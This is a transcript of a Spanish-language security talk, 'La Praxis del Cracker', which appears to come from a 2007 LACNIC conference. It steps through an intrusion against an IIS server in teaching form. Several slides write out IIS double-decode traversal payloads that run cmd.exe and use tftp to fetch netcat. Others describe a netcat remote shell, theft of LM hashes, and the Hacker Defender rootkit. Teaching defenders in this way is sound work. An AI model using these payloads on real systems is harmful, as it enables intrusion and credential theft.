La Praxis del Cracker

Transcripción

1 La Praxis del Cracker Miguel Torrealba S. Universidad Simón Bolívar Venezuela LACNIC X - Marzo Margarita

2 GISTI USB Laboratorio de Seguridad en Tecnología de la Información

3 La seguridad informática práctica es una sucesión de acciones y reacciones, de ataques y de defensas. Simson Garfinkel y Eugene Spafford (1999)

4

5 Footprinting (Hallar el Rastro)

6

7

8

9

10

11

12

13 Scanning (Exploración)

14

15

16

17

18

19

20 - La salida ya provee un indicio del servidor web que se está ejecutando y del puerto que está atendiendo las peticiones - Empleando otras herramientas como nmap de Fyodor, que identifican el sistema operativo usando TCP Stack Fingerprinting se puede obtener una información más confiable

21

22

23 Enumeration (Enumeración)

24

25

26

27

28

29

30

31

32

33

34

35

36 Gainning Access (Ganar Acceso)

37 %255c../.. %255c../winnt/system32/cmd.exe? c+dir+c:\ - Explotando la vulnerabilidad Decode del IIS 4.0 y 5.0, el Cracker puede examinar el contenido de cualquier carpeta del sistema víctima. - Para lograr eso solo requiere ejecutar el comando dir de la consola de comandos través del servidor La Praxis del Cracker amts Margarita 2007

38 %255c../.. %255c../winnt/system32/cmd.exe? c+dir+c:\ -..%255c.. =..(%25)5c.. =..%5c.. =..(%5c).. =.. \ Estructura lógica del disco de Jeremias: C: \ Inetpub \ scripts \

39

40

41

42

43

44

45

46 %255c../.. %255c../winnt/system32/cmd.exe? c+c:\winnt/system32/tftp.exe+i get+nc.exe - Explotando la vulnerabilidad Decode del IIS 4.0 y 5.0, el Cracker puede ejecutar el cliente ftp para transferir los archivos que desee al sistema víctima.

47

48

49

50 %255c../.. %255c../winnt/system32/cmd.exe? c+dir+c:\inetpub\scripts - Explotando la vulnerabilidad Decode del IIS 4.0 y 5.0, el Cracker puede verificar que el archivo que deseaba transferir al sistema víctima llegó correctamente y en cual carpeta reposa.

51

52 Hora de transferir un exploit - Httpodbc.dll es una biblioteca de enlace dinámica que permitirá al Cracker ejecutar, por medio del navegador, un programa que elevará los privilegios de ejecución y proveerá una interfaz más amigable. Se podrá así, ejecutar cualquier otro programa que se quiera, explotando la misma vulnerabilidad Decode del IIS 4.0 y Para el servidor web del sistema de la víctima este programa parecerá un código script que ha sido colocado para que los usuarios finales lo ejecuten

53

54

55

56

57

58

59

60 Ya es posible ejecutar, en forma más fácil, cualquier comando del sistema de operación a través del servidor web IIS 4.0 o 5.0

61 Escalating Privilege (Escalar Privilegios)

62

63 Con esta orden se procede a ejecutar NETCAT la navaja del ejército suizo de Hackers de sombrero blanco y negro, que activa una consola de comandos en el puerto 7001 del sistema víctima Un nuevo servicio de comandos queda escuchando desde ese instante

64

65

66

67

68 Desde una consola de comandos local el atacante- ejecuta ahora un telnet al puerto 7001 del sistema de la víctima La idea es disponer de un login remoto que permita ejecutar comandos en el sistema víctima Telnet puede operar entre equipos con diferentes Sistemas de Operación y provee un terminal virtual en la red

69

70 Con el Telnet se ha establecido una conexión TCP a la consola de comandos que escucha peticiones en el puerto 7001 del sistema víctima. Recuérdese que Telnet maneja ambos extremos del canal en forma simétrica Telnet permite además ver la salida de la ejecución de la órdenes remotas en la pantalla local. Es un servicio transparente Cualquier orden en el sistema víctima es posible de ser ejecutada, con todos los privilegios y en forma tan amigable que parecería ser un comando local

71

72

73

74

75 Pilfering (Ratería, Vileza, Bajeza, Ruindad)

76 El Cracker extrae entonces las cuentas y los LM Hashes de las contraseñas. Posteriormente puede usar un programa tipo Crackeador

77 Esta es una posible salida de lo que se obtendría. De esta forma el Cracker puede ahora suplantar a los usuarios autorizados en el sistema

78 Creating Backdoors (Crear las Puertas Traseras)

79 Ahora el Cracker puede sembrar calquier programa tipo backdoor que le permita volver a entrar en el sistema víctima y ganar privilegios, incluso si la vulnerabilidad Decode del IIS 4.0 y 5.0 es subsanada

80

81

82 Rootkit HD 1.0 versión de evaluación - Opera en sistemas WNT/W2K/WXP - Parecido a un troyano, pero con características adicionales para ocultar su existencia y ejecución. Intercepta las llamadas a la API Win32 de Windows y altera la respuesta - Genera un nuevo servicio Hacker Defender 100 sobre cualquier puerto del sistema víctima y se comunica con el atacante a través de un programa cliente bdclient - Puede adaptar su funcionamiento para disponer de distintas formas de operación - Provee facilidad de contraseña para controlar su ejecución

83 Covering Tracks (Cubrir las Huellas)

84 Finalmente, si se han transferido programas para alterar los logs, el Cracker puede borrar fácilmente toda huella de su actividad. En caso contrario puede hacerlo manualmente

85

86

87

88

89 Un administrador medianamente experimentado sospechará de inmediato si observa una salida como la anterior y la de abajo

90 CIERRE Conoced al enemigo y conoceos vos mismos; en cien batallas nunca correréis ningún peligro. Sun Tzu El Arte de la Guerra